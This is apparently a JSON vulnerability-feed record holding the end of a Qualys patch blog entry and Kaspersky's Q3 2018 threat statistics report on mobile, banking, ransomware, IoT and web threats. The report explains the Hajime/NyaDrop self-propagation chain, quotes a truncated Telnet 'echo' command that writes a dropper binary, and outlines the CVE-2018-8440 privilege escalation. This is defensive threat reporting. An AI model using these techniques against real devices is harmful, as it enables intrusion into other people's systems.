document](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180018>) on new speculative execution vulnerabilities in Intel processors, as well as a full [technical analysis](<https://blogs.technet.microsoft.com/srd/2018/08/10/analysis-and-mitigation-of-l1-terminal-fault-l1tf/>) including mitigation options. Patches have been released, but require registry configuration to enable all mitigations. Exploitation of this vulnerability can allow VM guests to retrieve data from other guests, as well as process-to-process, which is similar to Meltdown.\n\n### Adobe\n\nAdobe has also released patches covering [Flash](<https://helpx.adobe.com/security/products/flash-player/apsb18-25.html>), [Acrobat/Reader](<https://helpx.adobe.com/security/products/acrobat/apsb18-29.html>), [Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb18-26.html>), and [Creative Cloud](<https://helpx.adobe.com/security/products/creative-cloud/apsb18-20.html>). Two vulnerabilities in Acrobat and Reader have been marked as Critical. While Adobe ranks the Flash update as Important, Microsoft ranks it as Critical.", "modified": "2018-08-14T18:47:21", "published": "2018-08-14T18:47:21", "id": "QUALYSBLOG:86F4EEA0E7CEE93E9EA6A2FB3C2315F0", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2018/08/14/august-patch-tuesday-63-vulns-l1tf-exchange-sql-active-attacks-on-ie-flaw", "type": "qualysblog", "title": "August Patch Tuesday \u2013 63 Vulns, L1TF (Foreshadow), Exchange, SQL, Active Attacks on IE flaw", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-11-30T17:13:50", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-8373", "CVE-2018-8414", "CVE-2018-8440"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. _\n\n## Q3 figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.\n * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.\n * Ransomware attacks were registered on the computers of 259,867 unique users.\n * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,305,015 malicious installation packages\n * 55,101 installation packages for mobile banking Trojans\n * 13,075 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### Q3 events\n\nPerhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked \u2013 and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)\n\n_Number of users attacked by the mobile banker Asacub in 2017 and 2018_\n\nThe scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable. \n\n### Mobile threat statistics\n\nIn Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 less packages than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)\n\n#### Distribution of detected mobile apps by type\n\nAmong all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.\n\n_Distribution of newly detected mobile apps by type, Q2 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)\n\nSecond place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.\n\nThe share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).\n\nThe statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.\n\n**TOP 20 mobile malware**\n\n| Verdicts* | %** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 55.85 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.39 \n3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 \n4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 \n5 | Trojan.AndroidOS.Piom.toe | 3.23 \n6 | Trojan.AndroidOS.Dvmap.a | 3.12 \n7 | Trojan.AndroidOS.Triada.dl | 3.09 \n8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 \n10 | Trojan.AndroidOS.Agent.rt | 2,74 \n11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 \n12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 \n13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 \n14 | Trojan-Dropper.AndroidOS.Agent.ii | 1,77 \n15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 \n16 | Trojan.AndroidOS.Agent.pac | 1.61 \n17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 \n18 | Exploit.AndroidOS.Lotoor.be | 1.55 \n19 | Trojan.AndroidOS.Piom.uwp | 1.48 \n20 | Trojan.AndroidOS.Piom.udo | 1.36 \n \n_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._ \n_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nFirst place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>)..\n\nThird and fourth places went to representatives of the Asacub mobile banker family \u2013 Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).\n\n#### Geography of mobile threats\n\n_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware:**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 35.91 \n2 | Nigeria | 28.54 \n3 | Iran | 28.07 \n4 | Tanzania | 28.03 \n5 | China | 25.61 \n6 | India | 25.25 \n7 | Pakistan | 25.08 \n8 | Indonesia | 25.02 \n9 | Philippines | 23.07 \n10 | Algeria | 22.88 \n| | \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.\n\n### Mobile banking Trojans\n\nDuring the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018. \n\nThe largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 \n3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 \n4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 \n5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 \n6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 \n7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 \n8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 \n9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 \n10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nIn Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.\n\n_Geography of mobile banking threats, Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 2.18 \n2 | South Africa | 2.16 \n3 | Malaysia | 0.53 \n4 | Ukraine | 0.41 \n5 | Australia | 0.39 \n6 | China | 0.35 \n7 | South Korea | 0.33 \n8 | Tajikistan | 0.30 \n9 | USA | 0.27 \n10 | Poland | 0.25 \n| | \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.\n\n### Mobile ransomware Trojans\n\nIn Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 \n3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 \n4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 \n5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 \n8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 \n9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nIn Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family \u2013 Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.\n\n_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | USA | 1.73 \n2 | Kazakhstan | 0.36 \n3 | China | 0.14 \n4 | Italy | 0.12 \n5 | Iran | 0.11 \n6 | Belgium | 0.10 \n7 | Switzerland | 0.09 \n8 | Poland | 0.09 \n9 | Mexico | 0.09 \n10 | Romania | 0.08 \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nJust like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.\n\n## Attacks on IoT devices\n\nIn this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types. \n \nTelnet | 99,4% \nSSH | 0,6% \n \n_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_\n\n### Telnet attacks\n\n_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)\n\n**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**\n\n| Country | %* \n---|---|--- \n1 | China | 27.15% \n2 | Brazil | 10.57% \n3 | Russia | 7.87% \n4 | Egypt | 7.43% \n5 | USA | 4.47% \n6 | South Korea | 3.57% \n7 | India | 2.59% \n8 | Taiwan | 2.17% \n9 | Turkey | 1.82% \n10 | Italy | 1.75% \n \n_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._\n\nIn Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.\n\nSuccessful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn't require any utilities \u2013 it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.\n\nIt was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:\n\n 1. After successfully infecting a device, Hajime scans the network to find new victims.\n 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.\n 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.\n\nAll these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:\n \n \n echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\n\n480 bytes can be sent this way, but sending 60 KB becomes problematic.\n\n**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% \n2 | Backdoor.Linux.Mirai.ba | 16.31% \n3 | Backdoor.Linux.Mirai.b | 12.01% \n4 | Trojan-Downloader.Shell.Agent.p | 1.53% \n5 | Backdoor.Linux.Mirai.c | 1.33% \n6 | Backdoor.Linux.Gafgyt.ay | 1.15% \n7 | Backdoor.Linux.Mirai.au | 0.83% \n8 | Backdoor.Linux.Gafgyt.bj | 0.61% \n9 | Trojan-Downloader.Linux.Mirai.d | 0.51% \n10 | Backdoor.Linux.Mirai.bj | 0.37% \n \n_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._\n\nThe rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.\n\n## Financial threats\n\n### Q3 events\n\nThe banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&amp;C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.\n\nTo recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body.\n\n### Financial threat statistics\n\nIn Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.\n\n_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Germany | 3.0 \n2 | South Korea | 2.8 \n3 | Greece | 2.3 \n4 | Malaysia | 2.1 \n5 | Serbia | 2.0 \n6 | United Arab Emirates | 1.9 \n7 | Portugal | 1.9 \n8 | Lithuania | 1.9 \n9 | Indonesia | 1.8 \n10 | Cambodia | 1.8 \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 25.8 | \n2 | Nymaim | Trojan.Win32.Nymaim | 18.4 | \n3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 | \n4 | RTM | Trojan-Banker.Win32.RTM | 9.2 | \n5 | Emotet | Backdoor.Win32.Emotet | 5.9 | \n6 | Neurevt | Trojan.Win32.Neurevt | 4.7 | \n7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 | \n8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 | \n9 | Gozi | Trojan.Win32. Gozi | 1.6 | \n10 | Trickster | Trojan.Win32.Trickster | 1.4 | \n \n_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._\n\nIn Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.\n\nOverall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground \u2013 from 27% in Q2 to 18.4% in Q3 \u2013 and fell to second.\n\n## Cryptoware programs\n\n### Q3 events\n\nIn early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.\n\nAugust saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios \u2013 via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% | \n8 | Shade | Trojan-Ransom.Win32.Shade | 1,99% | \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% | \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% | \n| | | | | \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications. _\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Afghanistan | 16.85% \n2 | Uzbekistan | 14.23% \n3 | Kazakhstan | 10.17% \n4 | Belarus | 9.73% \n5 | Vietnam | 8.96% \n6 | Indonesia | 8.80% \n7 | Mozambique | 8.50% \n8 | Ukraine | 7.60% \n9 | Tanzania | 7.51% \n10 | Azerbaijan | 7.13% \n \n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Venezuela | 35.88 \n2 | Albania | 32.48 \n3 | Algeria | 32.41 \n4 | Belarus | 31.08 \n5 | Armenia | 29.16 \n6 | Ukraine | 28.67 \n7 | Moldova | 28.64 \n8 | Azerbaijan | 26.67 \n9 | Kyrgyzstan | 25.80 \n10 | Serbia | 25.38 \n11 | Mauritania | 24.89 \n12 | Indonesia | 24.68 \n13 | Romania | 24.56 \n14 | Qatar | 23.99 \n15 | Kazakhstan | 23.93 \n16 | Philippines | 23.84 \n17 | Lithuania | 23.70 \n18 | Djibouti | 23.70 \n19 | Latvia | 23.09 